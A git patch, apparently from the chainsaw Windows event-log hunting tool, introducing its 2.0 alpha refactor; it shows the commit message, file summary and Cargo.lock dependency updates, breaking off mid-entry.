From 857c5bb7d10a60603a44fa59cc3d664ce3673c59 Mon Sep 17 00:00:00 2001 
From: Alex Kornitzer Date: Mon, 2 May 2022 20:58:38 +0100 Subject: [PATCH 01/77] feat: clean, refactor and improve chainsaw This is the first alpha build for chainsaw 2.0. Apart from aiming to clean, refactor and improve the code, the following should be noted: - CSV output is no longer supported - The mapping files have changed format - Builtin rules have been removed; these will be added later in a different form - It's an alpha; anything could change --- Cargo.lock | 654 +++++++++--------------- Cargo.toml | 24 +- evtx_attack_samples | 1 - mapping_files/sigma-mapping.yml | 110 ---- mappings/sigma-event-logs.yml | 166 ++++++ sigma_rules | 1 - src/check.rs | 36 -- src/cli.rs | 266 ++++++++++ src/convert/mod.rs | 2 - src/convert/stalker.rs | 35 -- src/ext/mod.rs | 1 + src/ext/tau.rs | 129 +++++ src/file/evtx.rs | 93 ++++ src/file/mod.rs | 132 +++++ src/hunt.rs | 356 +++++++++++++ src/hunt/mod.rs | 873 -------------------------------- src/hunt/modules.rs | 730 -------------------------- src/lib.rs | 35 +- src/main.rs | 471 +++++++++++++---- src/rule/chainsaw.rs | 15 + src/rule/mod.rs | 99 ++++ src/{convert => rule}/sigma.rs | 12 - src/rule/stalker.rs | 38 ++ src/search.rs | 469 +++++++++-------- src/util.rs | 102 ---- src/write.rs | 37 +- 26 files changed, 2235 insertions(+), 2652 deletions(-) delete mode 160000 evtx_attack_samples delete mode 100644 mapping_files/sigma-mapping.yml create mode 100644 mappings/sigma-event-logs.yml delete mode 160000 sigma_rules delete mode 100644 src/check.rs create mode 100644 src/cli.rs delete mode 100644 src/convert/mod.rs delete mode 100644 src/convert/stalker.rs create mode 100644 src/ext/mod.rs create mode 100644 src/ext/tau.rs create mode 100644 src/file/evtx.rs create mode 100644 src/file/mod.rs create mode 100644 src/hunt.rs delete mode 100644 src/hunt/mod.rs delete mode 100644 src/hunt/modules.rs create mode 100644 src/rule/chainsaw.rs create mode 100644 src/rule/mod.rs rename src/{convert => rule}/sigma.rs (98%) create mode 
100644 src/rule/stalker.rs delete mode 100644 src/util.rs diff --git a/Cargo.lock b/Cargo.lock index f77b9ef4..9908a99d 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -3,52 +3,37 @@ version = 3 [[package]] -name = "addr2line" -version = "0.16.0" +name = "aho-corasick" +version = "0.6.10" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3e61f2b7f93d2c7d2b08263acaa4a363b3e276806c68af6134c44f523bf1aacd" +checksum = "81ce3d38065e618af2d7b77e10c5ad9a069859b4be3c2250f674af3840d9c8a5" dependencies = [ - "gimli", + "memchr", ] -[[package]] -name = "adler" -version = "1.0.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f26201604c87b1e01bd3d98f8d5d9a8fcbb815e8cedb41ffccbeb4bf593a35fe" - [[package]] name = "aho-corasick" version = "0.7.18" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "1e37cfd5e7657ada45f742d6e99ca5788580b5c529dc78faf11ece6dc702656f" dependencies = [ - "memchr 2.4.1", -] - -[[package]] -name = "ajson" -version = "0.2.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "fa6d6356148f1acf58e2bd07949af57855e1214172daab2153518608bb0dc6ee" -dependencies = [ - "regex", + "memchr", ] [[package]] name = "ansi_term" -version = "0.11.0" +version = "0.12.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ee49baf6cb617b853aa8d93bf420db2383fab46d314482ca2803b40d5fde979b" +checksum = "d52a9bb7ec0cf484c551830a7ce27bd20d67eac647e1befb56b0be4ee39a55d2" dependencies = [ "winapi", ] [[package]] name = "anyhow" -version = "1.0.43" +version = "1.0.57" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "28ae2b3dec75a406790005a200b1bd89785afc02517a00ca99ecfe093ee9e6cf" +checksum = "08f9b8508dccb7687a1d6c4ce66b2b0ecef467c94667de27d8d7fe1f8d2a9cdc" [[package]] name = "arrayref" 
@@ -75,24 +60,9 @@ dependencies = [ [[package]] name = "autocfg" -version = "1.0.1" +version = "1.1.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cdb031dd78e28731d87d56cc8ffef4a8f36ca26c38fe2de700543e627f8a464a" - -[[package]] -name = "backtrace" -version = "0.3.61" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e7a905d892734eea339e896738c14b9afce22b5318f64b951e70bf3844419b01" -dependencies = [ - "addr2line", - "cc", - "cfg-if", - "libc", - "miniz_oxide", - "object", - "rustc-demangle", -] +checksum = "d468802bab17cbc0cc575e9b053f41e72aa36bfa6b7f55e3529ffa43161b97fa" [[package]] name = "base64" @@ -119,12 +89,12 @@ dependencies = [ [[package]] name = "bstr" -version = "0.2.16" +version = "0.2.17" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "90682c8d613ad3373e66de8c6411e0ae2ab2571e879d2efbf73558cc66f21279" +checksum = "ba3569f383e8f1598449f1a423e72e99569137b47740b1da11ef19af3d5c3223" dependencies = [ "lazy_static", - "memchr 2.4.1", + "memchr", "regex-automata", "serde", ] @@ -137,9 +107,9 @@ checksum = "b4ae4235e6dac0694637c763029ecea1a2ec9e4e06ec2729bd21ba4d9c863eb7" [[package]] name = "bytecount" -version = "0.6.2" +version = "0.6.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "72feb31ffc86498dacdbd0fcebb56138e7177a8cc5cea4516031d15ae85a742e" +checksum = "2c676a478f63e9fa2dd5368a42f28bba0d6c560b775f38583c8bbaa7fcd67c9c" [[package]] name = "byteorder" @@ -147,6 +117,15 @@ version = "1.4.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "14c189c53d098945499cdfa7ecc63567cf3886b3332b312a5b4585d8d3a6a610" +[[package]] +name = "camino" +version = "1.0.9" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "869119e97797867fd90f5e22af7d0bd274bd4635ebb9eb68c04f3f513ae6c412" +dependencies = [ + "serde", +] + [[package]] name = "cargo-platform" version = "0.1.2" 
@@ -158,23 +137,17 @@ dependencies = [ [[package]] name = "cargo_metadata" -version = "0.12.3" +version = "0.14.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7714a157da7991e23d90686b9524b9e12e0407a108647f52e9328f4b3d51ac7f" +checksum = "4acbb09d9ee8e23699b9634375c72795d095bf268439da88562cf9b501f181fa" dependencies = [ + "camino", "cargo-platform", "semver", - "semver-parser", "serde", "serde_json", ] -[[package]] -name = "cc" -version = "1.0.70" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d26a6ce4b6a484fa3edb70f7efa6fc430fd2b87285fe8b84304fd0936faa0dc0" - [[package]] name = "cfg-if" version = "1.0.0" @@ -183,32 +156,24 @@ checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" [[package]] name = "chainsaw" -version = "1.1.7" +version = "2.0.0-alpha.0" dependencies = [ - "ajson", + "aho-corasick 0.7.18", "anyhow", "chrono", + "chrono-tz", "colour", - "csv 1.1.6", - "env_logger 0.6.2", "evtx", - "failure", - "glob", "indicatif", - "is_elevated", - "itertools", - "log", "paste", "prettytable-rs", "rayon", - "regex", + "regex 1.5.6", "serde", - "serde_derive", "serde_json", "serde_yaml", "structopt", "tau-engine", - "walkdir", ] [[package]] @@ -225,11 +190,22 @@ dependencies = [ "winapi", ] +[[package]] +name = "chrono-tz" +version = "0.4.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "aa1878c18b5b01b9978d5f130fe366d434022004d12fb87c182e8459b427c4a3" +dependencies = [ + "chrono", + "parse-zoneinfo", + "serde", +] + [[package]] name = "clap" -version = "2.33.3" +version = "2.34.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "37e58ac78573c40708d45522f0d80fa2f01cc4f9b4e2bf749807255454312002" +checksum = "a0610544180c38b88101fecf2dd634b174a62eef6946f84dfc6a7127512b381c" dependencies = [ "ansi_term", "atty", 
@@ -258,12 +234,25 @@ dependencies = [ "encode_unicode", "lazy_static", "libc", - "regex", + "regex 1.5.6", "terminal_size", "unicode-width", "winapi", ] +[[package]] +name = "console" +version = "0.15.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a28b32d32ca44b70c3e4acd7db1babf555fa026e385fb95f18028f88848b3c31" +dependencies = [ + "encode_unicode", + "libc", + "once_cell", + "terminal_size", + "winapi", +] + [[package]] name = "constant_time_eq" version = "0.1.5" @@ -281,9 +270,9 @@ dependencies = [ [[package]] name = "crossbeam-channel" -version = "0.5.1" +version = "0.5.4" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "06ed27e177f16d65f0f0c22a213e17c696ace5dd64b14258b52f9417ccb52db4" +checksum = "5aaa7bd5fb665c6864b5f963dd9097905c54125909c7aa94c9e18507cdbe6c53" dependencies = [ "cfg-if", "crossbeam-utils", @@ -302,10 +291,11 @@ dependencies = [ [[package]] name = "crossbeam-epoch" -version = "0.9.5" +version = "0.9.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4ec02e091aa634e2c3ada4a392989e7c3116673ef0ac5b72232439094d73b7fd" +checksum = "1145cf131a2c6ba0615079ab6a638f7e1973ac9c2634fcbeaaad6114246efe8c" dependencies = [ + "autocfg", "cfg-if", "crossbeam-utils", "lazy_static", @@ -315,9 +305,9 @@ dependencies = [ [[package]] name = "crossbeam-utils" -version = "0.8.5" +version = "0.8.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d82cfc11ce7f2c3faef78d8a684447b40d503d9681acebed6cb728d45940c4db" +checksum = "0bf124c720b7686e3c2663cf54062ab0f68a88af2fb6a030e87e30bf721fcb38" dependencies = [ "cfg-if", "lazy_static", 
@@ -348,17 +338,6 @@ dependencies = [ "winapi", ] -[[package]] -name = "csv" -version = "0.15.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7ef22b37c7a51c564a365892c012dc0271221fdcc64c69b19ba4d6fa8bd96d9c" -dependencies = [ - "byteorder", - "memchr 1.0.2", - "rustc-serialize", -] - [[package]] name = "csv" version = "1.1.6" @@ -367,7 +346,7 @@ checksum = "22813a6dc45b335f9bade10bf7271dc477e81113e89eb251a0bc2a8a81c536e1" dependencies = [ "bstr", "csv-core", - "itoa", + "itoa 0.4.8", "ryu", "serde", ] @@ -378,7 +357,7 @@ version = "0.1.10" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "2b2466559f260f48ad25fe6317b3c8dac77b5bdb5763ac7d9d6103530663bc90" dependencies = [ - "memchr 2.4.1", + "memchr", ] [[package]] @@ -387,7 +366,7 @@ version = "0.8.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "c9dd058f8b65922819fabb4a41e7d1964e56344042c26efbccd465202c23fa0c" dependencies = [ - "console", + "console 0.14.1", "lazy_static", "tempfile", "zeroize", @@ -404,12 +383,6 @@ dependencies = [ "winapi", ] -[[package]] -name = "dtoa" -version = "0.4.8" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "56899898ce76aaf4a0f24d914c97ea6ed976d42fec6ad33fcbb0a1103e07b2b0" - [[package]] name = "either" version = "1.6.1" @@ -486,19 +459,6 @@ version = "0.1.4" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "a246d82be1c9d791c5dfde9a2bd045fc3cbba3fa2b11ad558f27d01712f00569" -[[package]] -name = "env_logger" -version = "0.6.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "aafcde04e90a5226a6443b7aabdb016ba2f8307c847d524724bd9b346dd1a2d3" -dependencies = [ - "atty", - "humantime", - "log", - "regex", - "termcolor", -] - [[package]] name = "env_logger" version = "0.7.1" @@ -508,7 +468,7 @@ dependencies = [ "atty", "humantime", "log", - "regex", + "regex 1.5.6", "termcolor", ] 
@@ -548,25 +508,12 @@ dependencies = [ ] [[package]] -name = "failure" -version = "0.1.8" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d32e9bd16cc02eae7db7ef620b392808b89f6a5e16bb3497d159c6b92a0f4f86" -dependencies = [ - "backtrace", - "failure_derive", -] - -[[package]] -name = "failure_derive" -version = "0.1.8" +name = "fastrand" +version = "1.7.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "aa4da3c766cd7a0db8242e326e9e4e081edd567072893ed320008189715366a4" +checksum = "c3fcf0cee53519c866c09b5de1f6c56ff9d647101f81c1964fa632e148896cdf" dependencies = [ - "proc-macro2", - "quote", - "syn", - "synstructure", + "instant", ] [[package]] @@ -580,23 +527,6 @@ dependencies = [ "wasi 0.9.0+wasi-snapshot-preview1", ] -[[package]] -name = "getrandom" -version = "0.2.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7fcd999463524c52659517fe2cea98493cfe485d10565e7b0fb07dbba7ad2753" -dependencies = [ - "cfg-if", - "libc", - "wasi 0.10.2+wasi-snapshot-preview1", -] - -[[package]] -name = "gimli" -version = "0.25.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f0a01e0497841a3b2db4f8afa483cce65f7e96a3498bd6c541734792aeac8fe7" - [[package]] name = "glob" version = "0.3.0" @@ -638,9 +568,9 @@ dependencies = [ [[package]] name = "indexmap" -version = "1.7.0" +version = "1.8.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "bc633605454125dec4b66843673f01c7df2b89479b32e0ed634e43a91cff62a5" +checksum = "e6012d540c5baa3589337a98ce73408de9b5a25ec9fc2c6fd6be8f0d39e0ca5a" dependencies = [ "autocfg", "hashbrown", 
@@ -652,53 +582,38 @@ version = "0.16.2" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "2d207dc617c7a380ab07ff572a6e52fa202a2a8f355860ac9c38e23f8196be1b" dependencies = [ - "console", + "console 0.15.0", "lazy_static", "number_prefix", - "regex", + "regex 1.5.6", ] [[package]] name = "indoc" -version = "1.0.3" +version = "1.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e5a75aeaaef0ce18b58056d306c27b07436fbb34b8816c53094b76dd81803136" -dependencies = [ - "unindent", -] +checksum = "05a0bd019339e5d968b37855180087b7b9d512c5046fbd244cf8c95687927d6e" [[package]] name = "instant" -version = "0.1.10" +version = "0.1.12" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "bee0328b1209d157ef001c94dd85b4f8f64139adb0eac2659f4b08382b2f474d" +checksum = "7a5bbe824c507c5da5956355e86a746d82e0e1464f65d862cc5e71da70e94b2c" dependencies = [ "cfg-if", ] [[package]] -name = "is_elevated" -version = "0.1.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5299060ff5db63e788015dcb9525ad9b84f4fd9717ed2cbdeba5018cbf42f9b5" -dependencies = [ - "winapi", -] - -[[package]] -name = "itertools" -version = "0.10.1" +name = "itoa" +version = "0.4.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "69ddb889f9d0d08a67338271fa9b62996bc788c7796a5c18cf057420aaed5eaf" -dependencies = [ - "either", -] +checksum = "b71991ff56294aa922b450139ee08b3bfc70982c6b2c7562771375cf73542dd4" [[package]] name = "itoa" -version = "0.4.8" +version = "1.0.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b71991ff56294aa922b450139ee08b3bfc70982c6b2c7562771375cf73542dd4" +checksum = "112c678d4050afce233f4f2852bb2eb519230b3cf12f33585275537d7e41578d" [[package]] name = "lazy_static" 
@@ -708,9 +623,9 @@ checksum = "e2abad23fbc42b3700f2f279844dc832adb2b2eb069b2df918f455c4e18cc646" [[package]] name = "libc" -version = "0.2.101" +version = "0.2.126" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3cb00336871be5ed2c8ed44b60ae9959dc5b9f08539422ed43f09e34ecaeba21" +checksum = "349d5a591cd28b49e1d1037471617a32ddcda5731b99419008085f72d5a53836" [[package]] name = "linked-hash-map" 
@@ -720,61 +635,43 @@ checksum = "7fb9b38af92608140b86b693604b9ffcc5824240a484d1ecd4795bacb2fe88f3" [[package]] name = "lock_api" -version = "0.4.5" +version = "0.4.7" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "712a4d093c9976e24e7dbca41db895dabcbac38eb5f4045393d17a95bdfb1109" +checksum = "327fa5b6a6940e4699ec49a9beae1ea4845c6bab9314e4f84ac68742139d8c53" dependencies = [ + "autocfg", "scopeguard", ] [[package]] name = "log" -version = "0.4.14" +version = "0.4.17" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "51b9bbe6c47d51fc3e1a9b945965946b4c44142ab8792c50835a980d362c2710" +checksum = "abb12e687cfb44aa40f41fc3978ef76448f9b6038cad6aef4259d3c095a2382e" dependencies = [ "cfg-if", ] [[package]] name = "memchr" -version = "1.0.2" +version = "2.5.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "148fab2e51b4f1cfc66da2a7c32981d1d3c083a803978268bb11fe4b86925e7a" -dependencies = [ - "libc", -] - -[[package]] -name = "memchr" -version = "2.4.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "308cc39be01b73d0d18f82a0e7b2a3df85245f84af96fdddc5d202d27e47b86a" +checksum = "2dffe52ecf27772e601905b7522cb4ef790d2cc203488bbd0e2fe85fcb74566d" [[package]] name = "memoffset" -version = "0.6.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "59accc507f1338036a0477ef61afdae33cde60840f4dfe481319ce3ad116ddf9" -dependencies = [ - "autocfg", -] - -[[package]] -name = "miniz_oxide" -version = "0.4.4" +version = "0.6.5" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a92518e98c078586bc6c934028adcca4c92a53d6a958196de835170a01d84e4b" +checksum = "5aa361d4faea93603064a027415f07bd8e1d5c88c9fbf68bf56a285428fd79ce" dependencies = [ - "adler", "autocfg", ] [[package]] name = "mio" -version = "0.7.13" +version = "0.7.14" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = 
"8c2bdb6314ec10835cd3293dd268473a835c02b7b352e788be788b3c6ca6bb16" +checksum = "8067b404fe97c70829f082dec8bcf4f71225d7eaea1d8645349cb76fa06205cc" dependencies = [ "libc", "log", @@ -794,9 +691,9 @@ dependencies = [ [[package]] name = "ntapi" -version = "0.3.6" +version = "0.3.7" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3f6bb902e437b6d86e03cce10a7e2af662292c5dfef23b65899ea3ac9354ad44" +checksum = "c28774a7fd2fbb4f0babd8237ce554b73af68021b5f695a3cebd6c59bac0980f" dependencies = [ "winapi", ] @@ -814,9 +711,9 @@ dependencies = [ [[package]] name = "num-integer" -version = "0.1.44" +version = "0.1.45" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d2cc698a63b549a70bc047073d2949cce27cd1c7b0a4a862d08a8031bc2801db" +checksum = "225d3389fb3509a24c93f5c29eb6bde2586b98d9f016636dff58d7c6f7569cd9" dependencies = [ "autocfg", "num-traits", @@ -824,18 +721,18 @@ dependencies = [ [[package]] name = "num-traits" -version = "0.2.14" +version = "0.2.15" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9a64b1ec5cda2586e284722486d802acf1f7dbdc623e2bfc57e65ca1cd099290" +checksum = "578ede34cf02f8924ab9447f50c28075b4d3e5b269972345e7e0372b38c6cdcd" dependencies = [ "autocfg", ] [[package]] name = "num_cpus" -version = "1.13.0" +version = "1.13.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "05499f3756671c15885fee9034446956fff3f243d6077b91e5767df161f766b3" +checksum = "19e64526ebdee182341572e50e9ad03965aa510cd94427a4549448f285e957a1" dependencies = [ "hermit-abi", "libc", 
@@ -848,13 +745,10 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "830b246a0e5f20af87141b25c173cd1b609bd7779a4617d6ec582abaf90870f3" [[package]] -name = "object" -version = "0.26.2" +name = "once_cell" +version = "1.12.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "39f37e50073ccad23b6d09bcb5b263f4e76d3bb6038e4a3c08e52162ffa8abc2" -dependencies = [ - "memchr 2.4.1", -] +checksum = "7709cef83f0c1f58f666e746a08b21e0085f7440fa6a29cc194d68aac97a4225" [[package]] name = "parking_lot" 
@@ -876,46 +770,40 @@ dependencies = [ "cfg-if", "instant", "libc", - "redox_syscall 0.2.10", + "redox_syscall 0.2.13", "smallvec", "winapi", ] [[package]] -name = "paste" -version = "1.0.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0744126afe1a6dd7f394cb50a716dbe086cb06e255e53d8d0185d82828358fb5" - -[[package]] -name = "pest" -version = "2.1.3" +name = "parse-zoneinfo" +version = "0.1.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "10f4872ae94d7b90ae48754df22fd42ad52ce740b8f370b03da4835417403e53" +checksum = "f4ee19a3656dadae35a33467f9714f1228dd34766dbe49e10e656b5296867aea" dependencies = [ - "ucd-trie", + "regex 0.2.11", ] [[package]] -name = "pin-project-lite" -version = "0.2.7" +name = "paste" +version = "1.0.7" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8d31d11c69a6b52a174b42bdc0c30e5e11670f90788b2c471c31c1d17d449443" +checksum = "0c520e05135d6e763148b6426a837e239041653ba7becd2e538c076c738025fc" [[package]] -name = "ppv-lite86" -version = "0.2.10" +name = "pin-project-lite" +version = "0.2.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ac74c624d6b2d21f425f752262f42188365d7b8ff1aff74c82e45136510a4857" +checksum = "e0a7ae3ac2f1173085d398531c705756c94a4c56843785df85a60c1a0afac116" [[package]] name = "prettytable-rs" -version = "0.7.0" +version = "0.8.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5511ca4c805aa35f0abff6be7923231d664408b60c09f44ef715f2bce106cd9e" +checksum = "0fd04b170004fa2daccf418a7f8253aaf033c27760b5f225889024cf66d7ac2e" dependencies = [ "atty", - "csv 0.15.0", + "csv", "encode_unicode", "lazy_static", "term", 
@@ -948,21 +836,21 @@ dependencies = [ [[package]] name = "proc-macro2" -version = "1.0.29" +version = "1.0.39" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b9f5105d4fdaab20335ca9565e106a5d9b82b6219b5ba735731124ac6711d23d" +checksum = "c54b25569025b7fc9651de43004ae593a75ad88543b17178aa5e1b9c4f15f56f" dependencies = [ - "unicode-xid", + "unicode-ident", ] [[package]] name = "pulldown-cmark" -version = "0.8.0" +version = "0.9.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ffade02495f22453cd593159ea2f59827aae7f53fa8323f756799b670881dcf8" +checksum = "34f197a544b0c9ab3ae46c359a7ec9cbbb5c7bf97054266fecb7ead794a181d6" dependencies = [ "bitflags", - "memchr 2.4.1", + "memchr", "unicase", ] 
@@ -978,63 +866,23 @@ version = "0.22.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "8533f14c8382aaad0d592c812ac3b826162128b65662331e1127b45c3d18536b" dependencies = [ - "memchr 2.4.1", + "memchr", ] [[package]] name = "quote" -version = "1.0.9" +version = "1.0.18" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c3d0b9745dc2debf507c8422de05d7226cc1f0644216dfdfead988f9b1ab32a7" +checksum = "a1feb54ed693b93a84e14094943b84b7c4eae204c512b7ccb95ab0c66d278ad1" dependencies = [ "proc-macro2", ] -[[package]] -name = "rand" -version = "0.8.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2e7573632e6454cf6b99d7aac4ccca54be06da05aca2ef7423d22d27d4d4bcd8" -dependencies = [ - "libc", - "rand_chacha", - "rand_core", - "rand_hc", -] - -[[package]] -name = "rand_chacha" -version = "0.3.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e6c10a63a0fa32252be49d21e7709d4d4baf8d231c2dbce1eaa8141b9b127d88" -dependencies = [ - "ppv-lite86", - "rand_core", -] - -[[package]] -name = "rand_core" -version = "0.6.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d34f1408f55294453790c48b2f1ebbb1c5b4b7563eb1f418bcfcfdbb06ebb4e7" -dependencies = [ - "getrandom 0.2.3", -] - -[[package]] -name = "rand_hc" -version = "0.3.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d51e9f596de227fda2ea6c84607f5558e196eeaf43c986b724ba4fb8fdf497e7" -dependencies = [ - "rand_core", -] - [[package]] name = "rayon" -version = "1.5.1" +version = "1.5.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c06aca804d41dbc8ba42dfd964f0d01334eceb64314b9ecf7c5fad5188a06d90" +checksum = "bd99e5772ead8baa5215278c9b15bf92087709e9c1b2d1f97cdb5a183c933a7d" dependencies = [ "autocfg", "crossbeam-deque", 
@@ -1044,14 +892,13 @@ dependencies = [ [[package]] name = "rayon-core" -version = "1.9.1" +version = "1.9.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d78120e2c850279833f1dd3582f730c4ab53ed95aeaaaa862a2a5c71b1656d8e" +checksum = "258bcdb5ac6dad48491bb2992db6b7cf74878b0384908af124823d118c99683f" dependencies = [ "crossbeam-channel", "crossbeam-deque", "crossbeam-utils", - "lazy_static", "num_cpus", ] @@ -1063,9 +910,9 @@ checksum = "41cc0f7e4d5d4544e8861606a285bb08d3e70712ccc7d2b84d7c0ccfaf4b05ce" [[package]] name = "redox_syscall" -version = "0.2.10" +version = "0.2.13" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8383f39639269cde97d255a32bdb68c047337295414940c68bdd30c2e13203ff" +checksum = "62f25bc4c7e55e0b0b7a1d43fb893f4fa1361d0abe38b9ce4f323c2adfe6ef42" dependencies = [ "bitflags", ] @@ -1076,20 +923,33 @@ version = "0.3.5" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "de0737333e7a9502c789a36d7c7fa6092a49895d4faa31ca5df163857ded2e9d" dependencies = [ - "getrandom 0.1.16", + "getrandom", "redox_syscall 0.1.57", "rust-argon2", ] [[package]] name = "regex" -version = "1.5.4" +version = "0.2.11" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9329abc99e39129fcceabd24cf5d85b4671ef7c29c50e972bc5afe32438ec384" +dependencies = [ + "aho-corasick 0.6.10", + "memchr", + "regex-syntax 0.5.6", + "thread_local", + "utf8-ranges", +] + +[[package]] +name = "regex" +version = "1.5.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d07a8629359eb56f1e2fb1652bb04212c072a87ba68546a04065d525673ac461" +checksum = "d83f127d94bdbcda4c8cc2e50f6f84f4b611f69c902699ca385a39c3a75f9ff1" dependencies = [ - "aho-corasick", - "memchr 2.4.1", - "regex-syntax", + "aho-corasick 0.7.18", + "memchr", + "regex-syntax 0.6.26", ] [[package]] 
@@ -1100,9 +960,18 @@ checksum = "6c230d73fb8d8c1b9c0b3135c5142a8acee3a0558fb8db5cf1cb65f8d7862132" [[package]] name = "regex-syntax" -version = "0.6.25" +version = "0.5.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f497285884f3fcff424ffc933e56d7cbca511def0c9831a7f9b5f6153e3cc89b" +checksum = "7d707a4fa2637f2dca2ef9fd02225ec7661fe01a53623c1e6515b6916511f7a7" +dependencies = [ + "ucd-util", +] + +[[package]] +name = "regex-syntax" +version = "0.6.26" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "49b3de9ec5dc0a3417da371aab17d729997c15010e7fd24ff707773a33bddb64" [[package]] name = "remove_dir_all" @@ -1125,23 +994,11 @@ dependencies = [ "crossbeam-utils", ] -[[package]] -name = "rustc-demangle" -version = "0.1.21" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7ef03e0a2b150c7a90d01faf6254c9c48a41e95fb2a8c2ac1c6f0d2b9aefc342" - -[[package]] -name = "rustc-serialize" -version = "0.3.24" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "dcf128d1287d2ea9d80910b5f1120d0b8eede3fbf1abe91c40d39ea7d51e6fda" - [[package]] name = "ryu" -version = "1.0.5" +version = "1.0.10" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "71d301d4193d031abdd79ff7e3dd721168a9572ef3fe51a1517aba235bd8f86e" +checksum = "f3f6f92acf49d1b98f7a81226834412ada05458b7364277387724a237f062695" [[package]] name = "same-file" 
@@ -1160,37 +1017,27 @@ checksum = "d29ab0c6d3fc0ee92fe66e2d99f700eab17a8d57d1c1d3b748380fb20baa78cd" [[package]] name = "semver" -version = "0.11.0" +version = "1.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f301af10236f6df4160f7c3f04eec6dbc70ace82d23326abad5edee88801c6b6" +checksum = "8cb243bdfdb5936c8dc3c45762a19d12ab4550cdc753bc247637d4ec35a040fd" dependencies = [ - "semver-parser", "serde", ] -[[package]] -name = "semver-parser" -version = "0.10.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "00b0bef5b7f9e0df16536d3961cfb6e84331c065b4066afb39768d0e319411f7" -dependencies = [ - "pest", -] - [[package]] name = "serde" -version = "1.0.117" +version = "1.0.137" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b88fa983de7720629c9387e9f517353ed404164b1e482c970a90c1a4aaf7dc1a" +checksum = "61ea8d54c77f8315140a05f4c7237403bf38b72704d031543aa1d16abbf517d1" dependencies = [ "serde_derive", ] [[package]] name = "serde_derive" -version = "1.0.117" +version = "1.0.137" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cbd1ae72adb44aab48f325a02444a5fc079349a8d804c1fc922aed3f7454c74e" +checksum = 